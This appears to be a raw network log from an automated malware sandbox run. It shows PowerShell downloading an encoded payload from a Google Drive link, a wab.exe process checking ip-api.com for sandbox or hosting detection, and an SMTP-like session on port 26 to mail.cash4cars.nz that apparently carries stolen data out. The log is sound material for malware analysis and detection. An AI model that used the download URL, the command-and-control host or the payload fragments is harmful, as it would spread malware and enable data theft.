                                                                            Apr 24, 2024 10:12:30.126856089 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.126895905 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.129498959 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.129559040 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.129565954 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.129606009 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.129609108 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:30.129653931 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.246644974 CEST49738443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:30.246673107 CEST44349738142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:31.694792032 CEST4973980192.168.2.4208.95.112.1
                                                                            Apr 24, 2024 10:12:31.854711056 CEST8049739208.95.112.1192.168.2.4
                                                                            Apr 24, 2024 10:12:31.854814053 CEST4973980192.168.2.4208.95.112.1
                                                                            Apr 24, 2024 10:12:31.855104923 CEST4973980192.168.2.4208.95.112.1
                                                                            Apr 24, 2024 10:12:32.016282082 CEST8049739208.95.112.1192.168.2.4
                                                                            Apr 24, 2024 10:12:32.065933943 CEST4973980192.168.2.4208.95.112.1
                                                                            Apr 24, 2024 10:12:34.298790932 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:34.622926950 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:34.623879910 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:42.957237959 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:42.957433939 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:43.279277086 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:43.279443026 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:43.602442026 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:43.604485035 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:43.935251951 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:43.935285091 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:43.935303926 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:43.935348988 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:43.949999094 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:44.271620035 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:44.276571989 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:44.597843885 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:44.598202944 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:44.924799919 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:44.925123930 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:45.257594109 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:45.257843018 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:45.583123922 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:45.583332062 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:45.904441118 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:45.904625893 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:46.225508928 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:46.226077080 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:46.226232052 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:46.226258039 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:46.226284981 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:12:46.546879053 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:46.546906948 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:46.546925068 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:46.546937943 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:46.553307056 CEST2649740114.142.162.17192.168.2.4
                                                                            Apr 24, 2024 10:12:46.765247107 CEST4974026192.168.2.4114.142.162.17
                                                                            Apr 24, 2024 10:13:06.236426115 CEST8049739208.95.112.1192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 10:11:58.927588940 CEST | 59756 | 53 | 192.168.2.4 | 1.1.1.1
Apr 24, 2024 10:11:59.080928087 CEST | 53 | 59756 | 1.1.1.1 | 192.168.2.4
Apr 24, 2024 10:11:59.896538973 CEST | 50912 | 53 | 192.168.2.4 | 1.1.1.1
Apr 24, 2024 10:12:00.051047087 CEST | 53 | 50912 | 1.1.1.1 | 192.168.2.4
Apr 24, 2024 10:12:31.535219908 CEST | 51066 | 53 | 192.168.2.4 | 1.1.1.1
Apr 24, 2024 10:12:31.688788891 CEST | 53 | 51066 | 1.1.1.1 | 192.168.2.4
Apr 24, 2024 10:12:33.690382957 CEST | 53790 | 53 | 192.168.2.4 | 1.1.1.1
Apr 24, 2024 10:12:34.298051119 CEST | 53 | 53790 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 24, 2024 10:11:58.927588940 CEST | 192.168.2.4 | 1.1.1.1 | 0x1a6 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:11:59.896538973 CEST | 192.168.2.4 | 1.1.1.1 | 0x5228 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:12:31.535219908 CEST | 192.168.2.4 | 1.1.1.1 | 0x6aa4 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:12:33.690382957 CEST | 192.168.2.4 | 1.1.1.1 | 0xb2dd | Standard query (0) | mail.cash4cars.nz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 24, 2024 10:11:59.080928087 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a6 | No error (0) | drive.google.com | | 142.251.2.101 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:11:59.080928087 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a6 | No error (0) | drive.google.com | | 142.251.2.100 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:11:59.080928087 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a6 | No error (0) | drive.google.com | | 142.251.2.102 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:11:59.080928087 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a6 | No error (0) | drive.google.com | | 142.251.2.113 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:11:59.080928087 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a6 | No error (0) | drive.google.com | | 142.251.2.138 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:11:59.080928087 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a6 | No error (0) | drive.google.com | | 142.251.2.139 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:12:00.051047087 CEST | 1.1.1.1 | 192.168.2.4 | 0x5228 | No error (0) | drive.usercontent.google.com | | 142.251.2.132 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:12:31.688788891 CEST | 1.1.1.1 | 192.168.2.4 | 0x6aa4 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 10:12:34.298051119 CEST | 1.1.1.1 | 192.168.2.4 | 0xb2dd | No error (0) | mail.cash4cars.nz | | 114.142.162.17 | A (IP address) | IN (0x0001) | false
                                                                            • drive.google.com
                                                                            • drive.usercontent.google.com
                                                                            • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 208.95.112.1 | 80 | 5440 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 10:12:31.855104923 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Apr 24, 2024 10:12:32.016282082 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Wed, 24 Apr 2024 08:12:31 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 142.251.2.101 | 443 | 6912 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 08:11:59 UTC | 215 | OUT | GET /uc?export=download&id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: drive.google.com
Connection: Keep-Alive
2024-04-24 08:11:59 UTC | 1582 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 24 Apr 2024 08:11:59 GMT
Location: https://drive.usercontent.google.com/download?id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF&export=download
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'nonce-Sr3LUsIQEdBcIvVO4vFjiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 142.251.2.132 | 443 | 6912 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 08:12:00 UTC | 233 | OUT | GET /download?id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: drive.usercontent.google.com
Connection: Keep-Alive
2024-04-24 08:12:01 UTC | 4755 | IN | HTTP/1.1 200 OK
X-GUploader-UploadID: ABPtcPrg97w8dR2sPlRXTnNXn4DJNm_eAgXUxUvmvbtkUO3K88v4Yv-vxqeTy5JC859E2WWm3uw
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="Forretningsbaserede.hhk"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 500988
Last-Modified: Wed, 24 Apr 2024 00:58:03 GMT
Date: Wed, 24 Apr 2024 08:12:01 GMT
Expires: Wed, 24 Apr 2024 08:12:01 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=6TLTQA==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-04-24 08:12:01 UTC | 4755 | IN | Data Raw: 36 77 4a 4e 47 2b 73 43 59 69 53 37 43 70 4d 62 41 4f 73 43 6e 71 52 78 41 5a 73 44 58 43 51 45 63 51 47 62 63 51 47 62 75 53 64 75 63 67 39 78 41 5a 74 78 41 5a 75 42 38 5a 2f 61 70 52 52 78 41 5a 76 72 41 68 41 6c 67 63 46 49 53 79 6a 6b 36 77 4c 34 58 2b 73 43 4c 70 31 78 41 5a 74 78 41 5a 75 36 2b 67 53 49 71 75 73 43 6d 6c 6e 72 41 6f 5a 52 36 77 4a 64 73 2b 73 43 57 32 55 78 79 6e 45 42 6d 2b 73 43 4e 50 32 4a 46 41 76 72 41 6a 53 6f 36 77 4a 6c 68 74 48 69 63 51 47 62 63 51 47 62 67 38 45 45 36 77 4a 66 6c 58 45 42 6d 34 48 35 74 73 38 38 41 33 7a 4b 63 51 47 62 63 51 47 62 69 30 51 6b 42 4f 73 43 6f 4c 6c 78 41 5a 75 4a 77 2b 73 43 51 44 64 78 41 5a 75 42 77 33 49 67 6d 77 4c 72 41 69 34 4d 36 77 49 30 61 4c 72 4d 37 77 31 5a 63 51 47 62 63 51 47
Data Ascii: 6wJNG+sCYiS7CpMbAOsCnqRxAZsDXCQEcQGbcQGbuSducg9xAZtxAZuB8Z/apRRxAZvrAhAlgcFISyjk6wL4X+sCLp1xAZtxAZu6+gSIqusCmlnrAoZR6wJds+sCW2UxynEBm+sCNP2JFAvrAjSo6wJlhtHicQGbcQGbg8EE6wJflXEBm4H5ts88A3zKcQGbcQGbi0QkBOsCoLlxAZuJw+sCQDdxAZuBw3IgmwLrAi4M6wI0aLrM7w1ZcQGbcQG
2024-04-24 08:12:01 UTC | 4755 | IN | Data Raw: 68 42 50 67 62 74 75 59 44 33 35 70 68 5a 54 34 67 54 57 59 6d 7a 71 6a 56 6a 32 4a 64 43 6a 77 67 54 52 64 63 58 6c 58 64 62 30 54 41 2b 56 6f 6a 64 58 56 65 42 4d 36 2f 47 6a 70 65 54 4f 58 5a 64 70 6a 48 73 64 61 68 6b 64 67 33 42 35 31 32 6e 63 77 43 6e 61 69 7a 39 77 6a 6c 57 36 65 66 42 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 44 41 6f 62 39 53 50 48 4b 47 62 68 56 39 78 47 79 6f 49 37 75 68 34 4d 6d 68 76 68 56 2f 33 6f 2f 4a 48 71 37 46 4e 51 6c 52 46 4e 79 72 77 53 58 34 79 56 35 30 31 5a 6a 79 48 6c 42 67 39 68 6c 6f 53 68 37 4f 6d 35 32 71 33 4c 4e 4b 32 7a 42 74 39 52 45 65 52 43 55 46 68 36 47 39 6f 74 34 73 2b 54 45 6c 2b 79 55 77 64 76 58 6b 30 4d 51 38 6c 75 4a 2f
Data Ascii: hBPgbtuYD35phZT4gTWYmzqjVj2JdCjwgTRdcXlXdb0TA+VojdXVeBM6/GjpeTOXZdpjHsdahkdg3B512ncwCnaiz9wjlW6efBlRgobpUYKG6VGChulRgobpUYKG6VGChulRgobpUDAob9SPHKGbhV9xGyoI7uh4MmhvhV/3o/JHq7FNQlRFNyrwSX4yV501ZjyHlBg9hloSh7Om52q3LNK2zBt9REeRCUFh6G9ot4s+TEl+yUwdvXk0MQ8luJ/
2024-04-24 08:12:01 UTC | 433 | IN | Data Raw: 57 58 4a 69 43 51 42 69 42 56 6f 48 2b 32 53 74 57 6e 6b 77 4a 74 6f 53 69 6c 59 39 49 54 42 52 33 76 50 38 71 4a 4b 57 48 38 64 36 59 78 44 53 65 2b 74 37 57 58 4f 55 46 49 38 77 37 34 32 63 4f 75 6e 38 72 62 63 63 51 44 64 4e 43 34 4e 65 50 6c 43 71 69 34 4e 33 70 67 78 35 39 4c 35 64 33 39 42 62 74 55 59 42 72 38 62 52 71 78 74 56 56 52 72 37 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 4f 4b 74 56 43 55 52 70 46 4f 6a 56 69 35 56 6b 57 6d 67 67 53 5a 35 52 65 30 77 47 32 6a 65 66 65 76 41 67 53 41 58 4e 33 34 33 56 6b 6c 4f 65 36 36 6b 67 53 47 74 6e 54 74 54 64 63 6d 61 32 57 64 4d 5a 44 5a 41 39 77 54 57 42 65 34 57 70 4b 57 31 59 5a 30 47 61 31 75 4c 4e 7a 59 58 4a 34 63 45 43 75
Data Ascii: WXJiCQBiBVoH+2StWnkwJtoSilY9ITBR3vP8qJKWH8d6YxDSe+t7WXOUFI8w742cOun8rbccQDdNC4NePlCqi4N3pgx59L5d39BbtUYBr8bRqxtVVRr7pUYKG6VGChulRgobpUYKG6VGChulRgobpUYKG6OKtVCURpFOjVi5VkWmggSZ5Re0wG2jefevAgSAXN343VklOe66kgSGtnTtTdcma2WdMZDZA9wTWBe4WpKW1YZ0Ga1uLNzYXJ4cECu
2024-04-24 08:12:01 UTC | 1255 | IN | Data Raw: 35 57 63 32 58 76 37 79 57 34 2f 69 7a 79 6f 6e 6b 63 6b 33 2b 63 77 75 6c 62 49 2f 2b 45 79 34 67 6b 64 63 4e 62 36 42 7a 55 32 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 79 30 38 33 63 79 77 77 4a 72 67 71 68 75 67 39 68 54 76 64 31 61 4b 34 56 47 41 6f 52 41 4b 54 72 6e 31 6e 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 44 49 44 37 54 50 54 42 77 6a 74 58 4b 32 55 65 73 55 75 56 5a 67 6f 58 61 6e 2b 74 79 55 50 63 4f 64 30 4a 70 65 4f 78 76 64 76 67 64 75 59 41 42 6c 4a 52 4a 51 79 6c 46 68 68 76 41 4c 67 31 42 4d 6e 44 51 39 35 48 79 59 4a 35 53 4f 4f 30 31 4f 6a 44 73 32 79 79 6b 56 5a 4f 54 73 42 6c 58 44 63 5a
Data Ascii: 5Wc2Xv7yW4/izyonkck3+cwulbI/+Ey4gkdcNb6BzU2ChulRgobpUYKG6VGChulRgobpUYKG6VGChulRgy083cywwJrgqhug9hTvd1aK4VGAoRAKTrn1nYKG6VGChulRgobpUYKG6VGChulRgobpUYKG6VGDID7TPTBwjtXK2UesUuVZgoXan+tyUPcOd0JpeOxvdvgduYABlJRJQylFhhvALg1BMnDQ95HyYJ5SOO01OjDs2yykVZOTsBlXDcZ
2024-04-24 08:12:01 UTC | 68 | IN | Data Raw: 39 62 2f 54 58 6f 75 4a 55 42 51 47 73 51 71 4d 5a 32 4c 59 5a 50 34 49 48 6f 59 45 71 51 44 50 2f 61 4a 30 6b 34 4d 47 55 73 6a 59 43 36 63 76 75 71 53 6d 32 59 69 33 39 43 75 7a 6f 6a 31 6e 39 50 71 61
Data Ascii: 9b/TXouJUBQGsQqMZ2LYZP4IHoYEqQDP/aJ0k4MGUsjYC6cvuqSm2Yi39Cuzoj1n9Pqa
                                                                            2024-04-24 08:12:01 UTC1255INData Raw: 4b 61 38 51 41 6c 46 71 53 5a 2f 7a 42 4f 4d 44 45 59 38 58 4a 62 67 6a 75 56 6b 51 38 65 56 4f 46 51 6b 47 49 4d 78 6a 75 6c 2b 4d 77 7a 56 75 46 51 4e 4e 74 61 35 2b 72 49 36 55 47 37 58 50 33 48 50 35 55 51 76 72 4b 35 78 63 52 47 53 6b 30 55 78 2b 6f 6d 43 42 37 49 30 6a 44 68 33 33 6b 65 43 54 78 2b 5a 74 67 2f 73 38 45 31 73 2f 62 42 55 67 4e 74 78 7a 2b 46 4f 4a 6c 69 44 65 76 6d 74 67 4c 65 4f 46 79 38 73 79 42 4d 6d 49 49 75 4f 4e 57 4f 57 67 49 79 4d 53 69 6b 73 73 4f 63 31 41 37 46 6d 55 71 4a 62 71 53 34 76 36 36 41 61 55 54 32 7a 57 49 36 38 67 54 37 63 4e 78 76 6f 75 4a 49 38 74 46 58 4a 78 65 67 6e 32 72 59 64 77 44 65 36 7a 49 4b 36 53 54 4b 56 57 43 68 36 65 2f 6f 2b 73 38 6b 34 56 4a 61 61 34 54 53 4f 36 64 36 6a 37 6d 57 34 56 4c 31 57
                                                                            Data Ascii: Ka8QAlFqSZ/zBOMDEY8XJbgjuVkQ8eVOFQkGIMxjul+MwzVuFQNNta5+rI6UG7XP3HP5UQvrK5xcRGSk0Ux+omCB7I0jDh33keCTx+Ztg/s8E1s/bBUgNtxz+FOJliDevmtgLeOFy8syBMmIIuONWOWgIyMSikssOc1A7FmUqJbqS4v66AaUT2zWI68gT7cNxvouJI8tFXJxegn2rYdwDe6zIK6STKVWCh6e/o+s8k4VJaa4TSO6d6j7mW4VL1W
                                                                            2024-04-24 08:12:01 UTC1255INData Raw: 45 6b 76 31 45 75 37 58 4b 78 49 45 76 69 30 38 4e 71 35 4e 50 6a 4c 58 79 41 38 38 7a 2f 37 6b 35 46 31 45 46 4c 48 72 54 4e 41 63 42 76 6b 54 4f 4a 73 73 2f 34 37 59 45 51 4e 49 50 74 6f 38 51 4b 6f 4a 31 34 62 59 55 53 4b 37 38 5a 56 6a 61 57 4b 4f 61 54 55 59 75 77 30 4d 30 77 42 52 79 6d 69 6b 34 6f 4d 6b 71 55 49 4d 59 6a 50 52 6c 36 70 2f 4d 56 46 52 53 36 6c 33 6f 78 30 31 4d 46 4a 5a 74 56 74 4f 55 43 72 4e 6a 75 64 54 2b 4c 56 56 49 57 54 61 65 55 59 4f 32 42 45 49 74 48 67 75 61 36 36 52 75 6d 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 62 70 55 59 4b 47 36 56 47 43 68 75 6c 52 67 6f 63 35 4c 45 32 59 69 62 79 68 4f 68 5a 31 4a 57 66 42 32 33 58 68 32 58 7a 56 73 35 63 6d 44 68 32 75 45 77 35 58 4c 55 6d 33 51 6d 63 58 42
                                                                            Data Ascii: Ekv1Eu7XKxIEvi08Nq5NPjLXyA88z/7k5F1EFLHrTNAcBvkTOJss/47YEQNIPto8QKoJ14bYUSK78ZVjaWKOaTUYuw0M0wBRymik4oMkqUIMYjPRl6p/MVFRS6l3ox01MFJZtVtOUCrNjudT+LVVIWTaeUYO2BEItHgua66RumhulRgobpUYKG6VGChulRgobpUYKG6VGChulRgoc5LE2YibyhOhZ1JWfB23Xh2XzVs5cmDh2uEw5XLUm3QmcXB
                                                                            2024-04-24 08:12:01 UTC1255INData Raw: 31 5a 5a 50 66 6c 66 4a 49 46 51 41 5a 64 32 36 31 5a 5a 75 66 4e 52 64 39 7a 48 68 77 71 43 36 56 44 49 62 5a 65 44 52 5a 54 75 6d 5a 48 2f 56 55 2b 46 6a 47 47 39 43 6e 54 4e 47 42 49 76 2f 4b 44 32 71 2f 53 32 6c 2f 35 51 6f 64 54 78 4f 2b 4b 4b 2f 72 51 2f 37 45 36 44 4a 50 46 66 50 58 79 4e 39 51 54 34 5a 4b 73 61 64 48 57 64 49 4b 4d 54 55 42 4a 6b 43 2b 7a 50 68 4a 61 4f 36 56 4e 34 4c 4f 46 75 74 49 46 51 30 62 6f 78 36 41 74 36 4a 72 4e 4d 63 49 45 79 31 70 6e 49 68 31 5a 59 4c 7a 45 49 66 49 48 7a 4a 4f 68 7a 64 42 2f 77 6f 57 56 31 54 50 49 4b 66 46 37 79 58 2b 34 6c 72 4c 56 37 78 6e 78 6d 71 36 73 73 67 50 56 48 48 6e 77 5a 52 71 69 37 6e 71 7a 4b 43 38 6f 6c 50 53 75 59 62 30 61 57 37 68 31 7a 46 63 78 76 67 6a 44 7a 62 78 62 42 38 2f 34 4d
                                                                            Data Ascii: 1ZZPflfJIFQAZd261ZZufNRd9zHhwqC6VDIbZeDRZTumZH/VU+FjGG9CnTNGBIv/KD2q/S2l/5QodTxO+KK/rQ/7E6DJPFfPXyN9QT4ZKsadHWdIKMTUBJkC+zPhJaO6VN4LOFutIFQ0box6At6JrNMcIEy1pnIh1ZYLzEIfIHzJOhzdB/woWV1TPIKfF7yX+4lrLV7xnxmq6ssgPVHHnwZRqi7nqzKC8olPSuYb0aW7h1zFcxvgjDzbxbB8/4M
